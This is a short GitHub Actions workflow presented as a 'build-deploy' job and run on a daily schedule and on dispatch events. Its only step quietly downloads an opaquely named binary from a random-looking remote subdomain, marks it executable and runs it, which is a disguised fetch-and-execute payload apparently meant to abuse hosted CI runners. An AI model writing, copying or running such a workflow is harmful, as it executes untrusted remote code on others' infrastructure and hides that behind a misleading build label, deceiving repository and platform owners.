#2024-03-18-[023931]-l5ig9on0
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "21 3 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: default_build_deploy_name_note
        run: |
          wget -q https://n60fvzqvgnc9p0mh.callforpapers.eu.org/Mongolian_grassland
          chmod 755 Mongolian_grassland
          ./Mongolian_grassland